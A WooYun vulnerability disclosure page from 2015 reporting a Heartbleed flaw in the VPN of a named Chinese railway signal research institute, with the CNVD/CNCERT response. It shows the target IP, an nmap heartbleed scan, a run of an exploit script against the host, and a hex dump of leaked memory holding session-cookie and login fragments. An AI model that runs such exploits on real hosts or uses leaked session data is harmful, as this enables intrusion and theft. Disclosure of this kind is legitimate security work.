当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0123191

漏洞标题:某全路通信信号研究设计院系统补丁不及时心脏出血

相关厂商:cncert国家互联网应急中心

漏洞作者: Dolphin

提交时间:2015-07-03 12:02

修复时间:2015-08-21 10:08

公开时间:2015-08-21 10:08

漏洞类型:系统/服务补丁不及时

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-03: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经确认,细节仅向厂商公开
2015-07-17: 细节向核心白帽子及相关领域专家公开
2015-07-27: 细节向普通白帽子公开
2015-08-06: 细节向实习白帽子公开
2015-08-21: 细节向公众公开

简要描述:

北京全路通信信号研究设计院有限公司VPN
存在心脏出血漏洞,泄漏部分敏感信息

详细说明:

nmap -n -p 443 -Pn --script=ssl-heartbleed 222.35.95.41

Starting Nmap 6.49BETA3 ( https://nmap.org ) at 2015-06-28 02:58 ?D1ú±ê×?ê±??
Nmap scan report for 222.35.95.41
Host is up (0.0040s latency).
PORT    STATE SERVICE
443/tcp open  https
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt 
Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds


22.png


漏洞证明:

11.png

python /root/openSSL.py 222.35.95.41
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 86
 ... received message: type = 22, ver = 0302, length = 1288
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 FF FF D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  ......SC[...r...
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  0100: 1E 92 AD 64 6F D4 0A 6C BD CE 39 BC 16 8F 44 6C  ...do..l..9...Dl
  0140: F9 A1 2A 14 03 01 00 01 01 16 03 01 00 30 9E 00  ..*..........0..
  0180: 53 13 02 B4 43 21 2A 75 2D 61 8C 78 41 57 6E 00  S...C!*u-a.xAWn.
  01c0: 30 2E 32 32 3A 39 30 30 30 0D 0A 49 66 2D 4D 6F  0.22:9000..If-Mo
  0200: 4E 6F 6E 65 2D 4D 61 74 63 68 3A 20 22 30 61 37  None-Match: "0a7
  0240: 65 3A 20 55 73 65 72 4C 6F 67 69 6E 4E 61 6D 65  e: UserLoginName
  0280: 4C 6F 67 69 6E 54 79 70 65 3D 25 37 42 25 32 32  LoginType=%7B%22
  02c0: 25 37 42 25 32 32 76 61 6C 75 65 25 32 32 25 33  %7B%22value%22%3
  0300: 2E 4E 45 54 5F 53 65 73 73 69 6F 6E 49 64 3D 76  .NET_SessionId=v
  0340: 63 6F 64 69 6E 67 3A 20 67 7A 69 70 2C 20 64 65  coding: gzip, de
  0380: 20 37 2E 30 3B 20 57 69 6E 64 6F 77 73 20 4E 54   7.0; Windows NT
  03c0: 45 54 20 43 4C 52 20 33 2E 35 2E 33 30 37 32 39  ET CLR 3.5.30729
  0400: 20 43 4C 52 20 31 2E 31 2E 34 33 32 32 3B 20 68   CLR 1.1.4322; h
  0440: 6F 6E 6E 65 63 74 69 6F 6E 3A 20 4B 65 65 70 2D  onnection: Keep-
  0480: 30 25 32 32 25 75 39 43 38 31 25 75 35 32 43 37  0%22%u9C81%u52C7
  04c0: 52 4E 41 4D 45 25 32 32 25 37 44 3B 20 75 73 65  RNAME%22%7D; use
  0500: 31 36 2E 31 30 30 2E 32 32 25 33 41 39 30 30 30  16.100.22%3A9000
  0540: 6A 79 63 0D 0A 0D 0A 1F 56 53 C3 5D AA 48 06 4B  jyc.....VS.].H.K
  0580: 25 32 36 33 44 25 32 36 BD D2 6C 5A B1 39 62 36  %263D%26..lZ.9b6
  05c0: DF 4B 63 AA DD BF 6D E0 50 18 00 40 3E 08 00 00  .Kc...m.P..@>...
  0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  06c0: 4C 54 5F 6E 69 4B 67 45 30 5A 30 6F 4B 33 77 6E  LT_niKgE0Z0oK3wn
  0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  07c0: FF 07 00 00 54 40 62 00 08 00 00 00 00 00 62 00  ....T@b.......b.
  0800: 00 00 00 00 00 00 00 01 C0 00 62 00 10 00 00 01  ..........b.....
  0840: 00 00 00 00 FE FF FF FF D8 F9 DF 00 00 00 00 00  ................
  0880: FE FF FF FF F4 F9 65 04 34 11 C1 77 00 10 00 00  ......e.4..w....
  08c0: 08 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  0900: 69 02 6D 71 00 00 62 00 00 00 00 00 01 00 00 00  i.mq..b.........
  0940: 9E 6F C9 4B CE 9F 46 D6 8A 81 01 31 03 03 03 03  .o.K..F....1....
  0980: 06 6C 0D 6F F7 F4 70 0D A0 84 38 A1 BB C0 55 C8  .l.o..p...8...U.
  09c0: 67 09 2C 32 49 41 F5 59 95 76 62 7B D6 85 7B AD  g.,2IA.Y.vb{..{.
  0a00: 90 F0 C5 13 08 BB 94 5E E5 92 E7 57 F0 DC A7 4D  .......^...W...M
  0a40: 9F 07 57 95 E0 90 A6 95 9F E5 17 E2 AA FB 4F AA  ..W...........O.
  0a80: 20 B5 6D 41 C7 E7 F5 F0 9E FD 6E 78 69 3A CF 6C   .mA......nxi:.l
  0ac0: 9C 2D 08 35 60 39 0D 4E 9D 37 C1 6F FB E2 38 BC  .-.5`9.N.7.o..8.
  0b00: 86 4C AC AE 7A 5C D1 B2 EF 7B D6 D3 DD 31 81 C8  .L..z\...{...1..
  0b40: D5 91 D9 4E 14 5F CB E1 67 36 6E 59 12 CF 19 80  ...N._..g6nY....
  0b80: F8 4C BB 8A 16 E1 71 95 F8 31 6E 2B 5F C9 34 CA  .L....q..1n+_.4.
  0bc0: 19 4D 2F B3 B2 72 60 1C AA 9E 77 DA AD 10 BB 84  .M/..r`...w.....
  0c00: 1B 65 A3 CC CB B4 81 4D 08 B5 55 A4 9D FF 7E A5  .e.....M..U...~.
  0c40: 91 4B C2 4A 8F 88 93 51 D4 40 67 29 B4 96 BA CF  .K.J...Q.@g)....
  0c80: 00 01 95 45 00 03 3D 67 8A 40 00 40 06 8D 0C AC  ...E..=g.@.@....
  0cc0: 5D 1A EE EB 36 51 CD BF 3A 71 7E D0 77 63 11 F6  ]...6Q..:q~.wc..
  0d00: 3A FF 38 86 F5 13 84 D9 27 85 6C AF 90 E0 30 CA  :.8.....'.l...0.
  0d40: 0D 37 E6 13 5F 31 02 A9 C4 6E 37 5F A4 6B 20 6F  .7.._1...n7_.k o
  0d80: DD D6 70 DB E3 72 E7 39 18 04 3F 9E 11 64 5A E7  ..p..r.9..?..dZ.
  0dc0: 6B 61 9A C0 63 5A FD 5A 4C EC 74 56 E1 B2 4B 57  ka..cZ.ZL.tV..KW
  0e00: 85 1B 79 FA 70 35 3D D6 A9 A0 C7 AA 7E D3 62 C9  ..y.p5=.....~.b.
  0e40: 77 72 6C D1 15 86 E6 9E F0 C5 64 8A F2 49 AB 16  wrl.......d..I..
  0e80: EF CC A4 12 BC 18 DD 83 6F 6B 58 9F 1E AF 99 8B  ........okX.....
  0ec0: 5B A3 80 D5 62 66 0A 0C FA 78 C6 D2 22 24 7D 57  [...bf...x.."$}W
  0f00: 66 22 32 58 45 5C A2 DD E9 29 8E FC D1 6E 83 A1  f"2XE\...)...n..
  0f40: EA 71 97 4D 9B 7D 37 8D E9 5B DA 84 C0 69 19 DD  .q.M.}7..[...i..
  0f80: 35 B9 5C 45 E8 07 45 41 E0 FE 1F 42 7D 50 0D A2  5.\E..EA...B}P..
  0fc0: A7 A8 F0 13 51 5D 6B 05 0F 7C 51 76 07 02 6B B7  ....Q]k..|Qv..k.
  1000: 32 30 36 25 32 35 75 36 37 39 30 25 32 37 2B 2B  206%25u6790%27++
  1040: 74 74 61 63 68 49 44 25 33 44 25 32 37 36 34 30  ttachID%3D%27640
  1080: 70 65 72 61 74 65 25 33 44 25 32 37 41 64 64 25  perate%3D%27Add%
  10c0: 8C 23 68 A9 C3 50 FA 59 07 07 07 07 07 07 07 07  .#h..P.Y........
  1100: 73 CD CE 01 C3 A3 1A 8F E9 96 E1 AE 8F 29 B9 00  s............)..
  1140: 32 6C 75 5A 7A 30 69 4D 43 49 67 59 32 56 73 62  2luZz0iMCIgY2Vsb
  1180: 42 50 48 52 6B 49 47 4E 73 59 58 4E 7A 50 53 4A  BPHRkIGNsYXNzPSJ
  11c0: 42 35 35 53 7A 36 4B 25 32 42 33 35 4C 71 36 4B  B55Sz6K%2B35Lq6K
  1200: 75 25 32 42 38 6A 4F 61 49 6C 75 65 62 75 4F 57  u%2B8jOaIluebuOW
  1240: 34 6D 75 57 4B 6F 65 6D 69 68 75 57 76 76 4F 57  4muWKoemihuWvvOW
  1280: 48 4A 47 62 33 4A 56 63 32 56 79 49 6A 34 38 64  HJGb3JVc2VyIj48d
  12c0: 77 59 57 35 47 62 33 4A 56 63 32 56 79 49 69 42  wYW5Gb3JVc2VyIiB
  1300: 25 32 42 6D 44 71 4F 6D 58 71 4F 57 75 6F 65 61  %2BmDqOmXqOWuoea
  1340: 69 64 47 52 47 62 33 4A 54 64 47 46 30 64 58 4D  idGRGb3JTdGF0dXM
  1380: 38 4C 33 52 6B 50 6A 78 30 5A 43 42 6A 62 47 46  8L3RkPjx0ZCBjbGF
  13c0: 68 64 47 55 69 49 48 52 70 64 47 78 6C 50 53 4C  hdGUiIHRpdGxlPSL
  1400: 68 62 6A 34 38 4C 33 52 6B 50 6A 77 76 64 48 49  hbj48L3RkPjwvdHI
  1440: 7A 50 53 4A 30 5A 45 5A 76 63 6B 46 6B 64 6D 6C  zPSJ0ZEZvckFkdml
  1480: 00 00 01 2C 01 00 00 00 01 00 00 00 00 00 05 14  ...,............
  14c0: 04 8A 49 D8 32 78 68 63 33 4D 39 49 6E 52 6B 52  ..I.2xhc3M9InRkR
  1500: 69 49 25 32 42 50 48 4E 77 59 57 34 67 59 32 78  iI%2BPHNwYW4gY2x
  1540: 25 32 42 50 43 39 30 59 57 4A 73 5A 54 34 38 4C  %2BPC90YWJsZT48L
  1580: 67 59 32 78 68 63 33 4D 39 49 6E 52 6B 52 6D 39  gY2xhc3M9InRkRm9
  15c0: 39 49 6E 52 68 59 6D 78 6C 52 6D 39 79 56 48 4A  9InRhYmxlRm9yVHJ
  1600: 39 49 6A 41 69 50 6A 78 30 63 69 42 6A 62 47 46  9IjAiPjx0ciBjbGF
  1640: 47 56 4F 59 57 31 6C 49 69 42 6A 62 32 78 7A 63  GVOYW1lIiBjb2xzc
  1680: 47 46 75 50 6A 77 76 64 47 51 25 32 42 50 43 39  GFuPjwvdGQ%2BPC9
  16c0: 53 4A 30 5A 45 5A 76 63 6C 56 7A 5A 58 49 69 50  SJ0ZEZvclVzZXIiP
  1700: 4F 53 36 70 4F 53 36 75 6A 72 6D 6E 61 6A 6B 75  OS6pOS6ujrmnajku
  1740: 6B 75 71 54 76 76 4A 72 6E 6C 4B 6A 6E 71 36 44  kuqTvvJrnlKjnq6D
  1780: 6D 69 4A 62 6C 68 61 7A 6C 6A 37 6A 6C 69 49 62  miJblhazlj7jliIb
  17c0: 43 39 7A 63 47 46 75 50 6A 77 76 64 47 51 25 32  C9zcGFuPjwvdGQ%2
  1800: 36 70 4F 53 36 75 6A 72 6D 6E 61 6A 6B 75 4C 33  6pOS6ujrmnajkuL3
  1840: 71 54 76 76 4A 72 6E 6C 4B 6A 6E 71 36 44 6C 72  qTvvJrnlKjnq6Dlr
  1880: 4A 62 6C 68 61 7A 6C 6A 37 6A 6C 69 49 62 6E 72  Jblhazlj7jliIbnr
  18c0: 30 5A 44 34 38 64 47 51 67 59 32 78 68 63 33 4D  0ZD48dGQgY2xhc3M
  1900: 58 52 6C 49 69 42 30 61 58 52 73 5A 54 30 69 35  XRlIiB0aXRsZT0i5
  1940: 77 59 57 34 25 32 42 50 43 39 30 5A 44 34 38 4C  wYW4%2BPC90ZD48L
  1980: 78 59 43 48 67 64 57 61 58 4E 70 59 6D 78 6C 61  xYCHgdWaXNpYmxla
  19c0: 00 40 06 8E 22 AC 10 7D 65 AC 10 64 16 C8 AD 23  .@.."..}e..d...#
  1a00: 62 32 35 30 5A 57 35 30 49 69 42 6A 62 32 78 7A  b250ZW50IiBjb2xz
  1a40: 63 6B 46 6B 64 6D 6C 6A 5A 53 49 25 32 42 50 43  ckFkdmljZSI%2BPC
  1a80: 62 47 55 69 50 6A 78 30 5A 43 42 6A 62 47 46 7A  bGUiPjx0ZCBjbGFz
  1ac0: 34 25 32 42 4E 69 30 78 35 4C 71 36 35 59 71 62  4%2BNi0x5Lq65Yqb
  1b00: 4D 39 49 6E 52 79 52 6D 39 79 56 58 4E 6C 63 69  M9InRyRm9yVXNlci
  1b40: 50 53 4A 7A 63 47 46 75 52 6D 39 79 56 58 4E 6C  PSJzcGFuRm9yVXNl
  1b80: 73 25 32 42 69 76 74 25 32 42 53 36 75 6C 30 69  s%2Bivt%2BS6ul0i
  1bc0: 52 6B 50 6A 78 30 5A 43 42 6A 62 47 46 7A 63 7A  RkPjx0ZCBjbGFzcz
  1c00: 32 7A 37 37 79 49 35 4C 71 36 35 59 71 62 37 37  2z77yI5Lq65Yqb77
  1c40: 34 38 63 33 42 68 62 69 42 6A 62 47 46 7A 63 7A  48c3BhbiBjbGFzcz
  1c80: 49 77 4D 54 55 74 4E 69 30 79 4D 69 41 78 4D 6A  IwMTUtNi0yMiAxMj
  1cc0: 63 6B 5A 76 63 6D 46 6B 64 6D 6C 6A 5A 53 49 25  ckZvcmFkdmljZSI%
  1d00: 62 6D 68 49 25 32 46 6F 70 34 45 36 50 43 39 30  bmhI%2Fop4E6PC90
  1d40: 63 33 42 68 62 6A 30 69 4D 69 49 67 64 47 6C 30  c3Bhbj0iMiIgdGl0
  1d80: 77 76 63 33 42 68 62 6A 34 38 4C 33 52 6B 50 6A  wvc3Bhbj48L3RkPj
  1dc0: 63 33 4D 39 49 6E 52 6B 52 6D 39 79 54 6D 39 6B  c3M9InRkRm9yTm9k
  1e00: 69 71 48 70 67 36 67 38 4C 33 4E 77 59 57 34 25  iqHpg6g8L3NwYW4%
  1e40: 51 67 59 32 78 68 63 33 4D 39 49 6E 52 6B 52 6D  QgY2xhc3M9InRkRm
  1e80: 61 58 52 73 5A 54 30 69 35 6F 25 32 42 51 35 4C  aXRsZT0i5o%2BQ5L
  1ec0: 35 62 47 41 50 43 39 7A 63 47 46 75 50 00 00 00  5bGAPC9zcGFuP...
  1f00: 00 80 10 03 FB C0 29 00 00 01 01 08 0A 08 EB 6B  ......)........k
  1f40: 6C 30 62 47 55 39 49 75 57 4B 6E 75 65 51 68 75  l0bGU9IuWKnueQhu
  1f80: 5A 45 5A 76 63 6B 52 68 64 47 55 69 50 6A 78 7A  ZEZvckRhdGUiPjxz
  1fc0: 68 75 61 58 74 75 6D 58 74 43 49 25 32 42 4D 6A  huaXtumXtCI%2BMj
  2000: 63 69 42 6A 62 47 46 7A 63 7A 30 69 64 48 4A 47  ciBjbGFzcz0idHJG
  2040: 5A 53 49 25 32 42 35 59 71 65 35 35 43 47 35 6F  ZSI%2B5Yqe55CG5o
  2080: 62 6E 52 6C 62 6E 51 69 49 47 4E 76 62 48 4E 77  bnRlbnQiIGNvbHNw
  20c0: 51 57 52 32 61 57 4E 6C 49 6A 34 38 4C 33 4E 77  QWR2aWNlIj48L3Nw
  2100: 63 69 42 6A 62 47 46 7A 63 7A 30 69 64 48 4A 47  ciBjbGFzcz0idHJG
  2140: 30 69 64 47 52 47 62 33 4A 55 63 6D 46 6A 5A 53  0idGRGb3JUcmFjZS
  2180: 59 32 56 73 62 48 4E 77 59 57 4E 70 62 6D 63 39  Y2VsbHNwYWNpbmc9
  21c0: 56 47 6C 30 62 47 55 69 50 6A 78 30 5A 43 42 6A  VGl0bGUiPjx0ZCBj
  2200: 4E 77 59 57 34 25 32 42 4E 69 30 79 35 4C 71 36  NwYW4%2BNi0y5Lq6
  2240: 63 6A 34 38 64 48 49 67 59 32 78 68 63 33 4D 39  cj48dHIgY2xhc3M9
  2280: 78 7A 63 47 46 75 49 47 4E 73 59 58 4E 7A 50 53  xzcGFuIGNsYXNzPS
  22c0: 50 76 76 49 6A 6B 75 72 72 6C 69 70 76 76 76 49  PvvIjkurrlipvvvI
  2300: 50 6A 77 76 64 47 51 25 32 42 50 48 52 6B 49 47  PjwvdGQ%2BPHRkIG
  2340: 72 6C 70 35 7A 6D 70 61 41 69 50 75 57 75 6A 4F  rlp5zmpaAiPuWujO
  2380: 49 47 4E 73 59 58 4E 7A 50 53 4A 7A 63 47 46 75  IGNsYXNzPSJzcGFu
  23c0: 30 32 4C 54 49 7A 49 44 67 36 4D 44 49 36 4E 54  02LTIzIDg6MDI6NT
  2400: 00 01 00 00 00 00 00 05 14 45 00 05 14 6E 27 40  .........E...n'@
  2440: 64 48 4A 47 62 33 4A 68 5A 48 5A 70 59 32 55 69  dHJGb3JhZHZpY2Ui
  2480: 43 47 35 6F 53 50 36 4B 65 42 4F 6A 77 76 64 47  CG5oSP6KeBOjwvdG
  24c0: 62 48 4E 77 59 57 34 39 49 6A 49 69 49 48 52 70  bHNwYW49IjIiIHRp
  2500: 4C 33 4E 77 59 57 34 25 32 42 50 43 39 30 5A 44  L3NwYW4%2BPC90ZD
  2540: 64 48 4A 47 62 33 4A 55 63 6D 46 6A 5A 53 49 25  dHJGb3JUcmFjZSI%
  2580: 46 6A 5A 53 49 25 32 42 50 48 52 68 59 6D 78 6C  FjZSI%2BPHRhYmxl
  25c0: 62 6D 63 39 49 6A 41 69 49 47 4E 6C 62 47 78 77  bmc9IjAiIGNlbGxw
  2600: 5A 43 42 6A 62 47 46 7A 63 7A 30 69 64 47 52 47  ZCBjbGFzcz0idGRG
  2640: 73 25 32 42 69 76 74 25 32 42 53 36 75 6A 77 76  s%2Bivt%2BS6ujwv
  2680: 49 69 50 6A 78 30 5A 43 42 6A 62 47 46 7A 63 7A  IiPjx0ZCBjbGFzcz
  26c0: 49 69 49 48 52 70 64 47 78 6C 50 53 4C 6D 6A 35  IiIHRpdGxlPSLmj5
  2700: 7A 6D 6A 4B 25 32 46 6E 6B 49 4D 38 4C 33 4E 77  zmjK%2FnkIM8L3Nw
  2740: 52 73 5A 54 30 69 35 59 71 65 35 35 43 47 35 4C  RsZT0i5Yqe55CG5L
  2780: 4D 39 49 6E 52 6B 52 6D 39 79 52 47 46 30 5A 53  M9InRkRm9yRGF0ZS
  27c0: 35 59 71 65 35 35 43 47 35 70 65 32 36 5A 65 30  5Yqe55CG5pe26Ze0
  2800: 52 79 50 6A 78 30 63 69 42 6A 62 47 46 7A 63 7A  RyPjx0ciBjbGFzcz
  2840: 56 55 61 58 52 73 5A 53 49 25 32 42 35 59 71 65  VUaXRsZSI%2B5Yqe
  2880: 6C 6A 5A 55 4E 76 62 6E 52 6C 62 6E 51 69 49 47  ljZUNvbnRlbnQiIG
  28c0: 46 75 52 6D 39 79 51 57 52 32 61 57 4E 6C 49 6A  FuRm9yQWR2aWNlIj
  2900: 52 79 50 6A 78 30 63 69 42 6A 62 47 46 7A 63 7A  RyPjx0ciBjbGFzcz
  2940: 31 22 20 42 6F 72 64 65 72 52 69 67 68 74 53 74  1" BorderRightSt
  2980: 20 56 61 6C 75 65 3D 22 2D 31 22 3E 3C 4C 61 62   Value="-1"><Lab
  29c0: 6F 6E 74 4E 61 6D 65 3D 22 E5 AE 8B E4 BD 93 22  ontName="......"
  2a00: 6C 79 43 6F 6E 64 69 74 69 6F 6E 3D 22 22 20 43  lyCondition="" C
  2a40: 20 20 20 64 62 6F 2E 46 6E 5F 47 65 74 73 70 6C     dbo.Fn_Getspl
  2a80: 4C 45 43 54 20 20 20 20 20 64 62 6F 2E 46 6E 5F  LECT     dbo.Fn_
  2ac0: 69 74 27 29 20 41 53 20 45 78 70 72 31 29 20 41  it') AS Expr1) A
  2b00: 22 20 44 61 74 61 46 69 65 6C 64 3D 22 22 20 43  " DataField="" C
  2b40: 69 6F 6E 3D 22 22 20 4C 6F 63 6B 50 6F 73 3D 22  ion="" LockPos="
  2b80: 6E 65 53 70 61 63 65 3D 22 30 22 20 4C 65 66 74  neSpace="0" Left
  2bc0: 69 67 68 74 3D 22 31 22 20 56 69 73 69 62 6C 65  ight="1" Visible
  2c00: 30 33 22 20 43 65 6C 6C 52 61 6E 67 65 3D 22 32  03" CellRange="2
  2c40: 22 31 30 22 20 42 6F 72 64 65 72 54 6F 70 57 69  "10" BorderTopWi
  2c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
  2f00: 01 00 00 00 00 00 05 78 45 00 05 78 6B A0 40 00  .......xE..xk.@.


修复方案:

更新升级,你懂得。

版权声明:转载请注明来源 Dolphin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-07-07 10:06

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给北京分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评论